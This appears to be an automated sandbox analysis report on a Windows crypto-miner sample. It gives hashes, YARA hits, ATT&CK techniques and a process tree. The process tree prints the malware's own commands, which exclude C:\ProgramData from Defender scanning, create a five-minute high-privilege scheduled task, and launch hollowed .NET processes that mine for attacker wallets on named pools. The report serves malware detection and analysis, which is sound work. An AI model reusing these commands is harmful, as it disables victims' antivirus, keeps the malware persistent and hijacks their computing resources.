a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

Analysis

max time kernel
295s
max time network
293s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
15/09/2022, 10:24

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
Size

861KB
MD5

e9e181f8c1c5f7a83c3833e8cb4097fd
SHA1

b39eba15f351c4e2f1097a421c7e0fc810911d1d
SHA256

a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01
SHA512

5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275
SSDEEP

6144:xqxcWSwdmsGPrGMdg3qA8YSweoxd8iHwrK6fJQuTDig/OnocA6DDmqcjlJUu+x0R:xqBSCBIwhxROKOquTZyPuYqcGbOqXZ

Score

9^/10

miner upx

Malware Config

Signatures

Detectes Phoenix Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/2236-211-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/2236-212-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

Executes dropped EXE 2 IoCs

pid	Process
2992	DHUZT.exe
388	DHUZT.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2236-207-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2236-209-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2236-210-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2236-211-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/2236-212-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2236	RegSvcs.exe
2236	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2992 set thread context of 4964	2992	DHUZT.exe	79
PID 2992 set thread context of 2236	2992	DHUZT.exe	82

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3624	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1520	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5016	powershell.exe
5016	powershell.exe
5016	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
2992	DHUZT.exe
2992	DHUZT.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	2300	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeIncreaseQuotaPrivilege	5016	powershell.exe
Token: SeSecurityPrivilege	5016	powershell.exe
Token: SeTakeOwnershipPrivilege	5016	powershell.exe
Token: SeLoadDriverPrivilege	5016	powershell.exe
Token: SeSystemProfilePrivilege	5016	powershell.exe
Token: SeSystemtimePrivilege	5016	powershell.exe
Token: SeProfSingleProcessPrivilege	5016	powershell.exe
Token: SeIncBasePriorityPrivilege	5016	powershell.exe
Token: SeCreatePagefilePrivilege	5016	powershell.exe
Token: SeBackupPrivilege	5016	powershell.exe
Token: SeRestorePrivilege	5016	powershell.exe
Token: SeShutdownPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeSystemEnvironmentPrivilege	5016	powershell.exe
Token: SeRemoteShutdownPrivilege	5016	powershell.exe
Token: SeUndockPrivilege	5016	powershell.exe
Token: SeManageVolumePrivilege	5016	powershell.exe
Token: 33	5016	powershell.exe
Token: 34	5016	powershell.exe
Token: 35	5016	powershell.exe
Token: 36	5016	powershell.exe
Token: SeDebugPrivilege	2992	DHUZT.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemProfilePrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeProfSingleProcessPrivilege	4668	powershell.exe
Token: SeIncBasePriorityPrivilege	4668	powershell.exe
Token: SeCreatePagefilePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeRemoteShutdownPrivilege	4668	powershell.exe
Token: SeUndockPrivilege	4668	powershell.exe
Token: SeManageVolumePrivilege	4668	powershell.exe
Token: 33	4668	powershell.exe
Token: 34	4668	powershell.exe
Token: 35	4668	powershell.exe
Token: 36	4668	powershell.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 5016	2300	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	66
PID 2300 wrote to memory of 5016	2300	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	66
PID 2300 wrote to memory of 5028	2300	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	68
PID 2300 wrote to memory of 5028	2300	a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe	68
PID 5028 wrote to memory of 1520	5028	cmd.exe	70
PID 5028 wrote to memory of 1520	5028	cmd.exe	70
PID 5028 wrote to memory of 2992	5028	cmd.exe	72
PID 5028 wrote to memory of 2992	5028	cmd.exe	72
PID 2992 wrote to memory of 4668	2992	DHUZT.exe	74
PID 2992 wrote to memory of 4668	2992	DHUZT.exe	74
PID 2992 wrote to memory of 4140	2992	DHUZT.exe	75
PID 2992 wrote to memory of 4140	2992	DHUZT.exe	75
PID 4140 wrote to memory of 3624	4140	cmd.exe	77
PID 4140 wrote to memory of 3624	4140	cmd.exe	77
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 2992 wrote to memory of 4964	2992	DHUZT.exe	79
PID 4964 wrote to memory of 4756	4964	vbc.exe	81
PID 4964 wrote to memory of 4756	4964	vbc.exe	81
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82
PID 2992 wrote to memory of 2236	2992	DHUZT.exe	82

C:\Users\Admin\AppData\Local\Temp\a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe
"C:\Users\Admin\AppData\Local\Temp\a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52E7.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1520
- - C:\ProgramData\ccl\DHUZT.exe
    "C:\ProgramData\ccl\DHUZT.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4668
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4140
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3624
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.Vlad -p x -t 5
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4964
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4756
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0xD97F71F033a694e2b2FC8E7D615cdF742C65b2d3.VladHhh1 -coin etc -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2236

C:\ProgramData\ccl\DHUZT.exe
C:\ProgramData\ccl\DHUZT.exe
1⤵
- Executes dropped EXE
PID:388

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
C:\ProgramData\ccl\DHUZT.exe

Filesize
861KB

MD5
e9e181f8c1c5f7a83c3833e8cb4097fd

SHA1
b39eba15f351c4e2f1097a421c7e0fc810911d1d

SHA256
a7acb47cea9f605ef98b0ea8460db8a9535ab2600b406d1db6757b6bc4ccaf01

SHA512
5cfb74bf0023a1f7d7ba3b892dd4ac0bb6ce249a1ff4c182e3075229ea843bd9eea48f9a6b30c98bf24b45c7148fd62c5a7675b68b8c176110c3fa351d1c2275

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHUZT.exe.log

Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d1c9dc573be3889b1610ec03a134c62f

SHA1
61847a73b87fd1df01407e4c74bfaffb0a4c5852

SHA256
6de9585855b605a4d7963878e28d86e652e2c5a4da28e0e512f84976048e3d2e

SHA512
f19bbc93537fc1e10a6ae5c005e13d004f7488324463dd48c42e7918cfbd1b2c46322b5f744f27b70ae574ff3a5e78e1e0e48ec612a8e2fe86ed4ac16cf60267

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp52E7.tmp.bat

Filesize
137B

MD5
a68569a77cb8c9b170d22acf2d23b8ff

SHA1
79cf68633ce210907c2a2caf801101b8ce8a9fba

SHA256
5ca805062248a225c5bcb720bb1e4fabbe75a978fd50fd4f11d50150ca4f09e2

SHA512
5e7cdec0c0c3a0201e4b267dd28a031c430862f370604c203519647688464c735cacd32c108602ac08067462a0b724133b357679d3ce6c3263cb2401507e18cd

Download Submit
memory/2236-209-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2236-210-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2236-211-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2236-212-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2236-207-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/2300-116-0x0000000000C20000-0x0000000000CFC000-memory.dmp

Filesize
880KB

Download
memory/4964-200-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4964-206-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4964-202-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4964-205-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/4964-203-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/5016-128-0x000001D378E90000-0x000001D378F06000-memory.dmp

Filesize
472KB

Download
memory/5016-125-0x000001D378CE0000-0x000001D378D02000-memory.dmp

Filesize
136KB

Download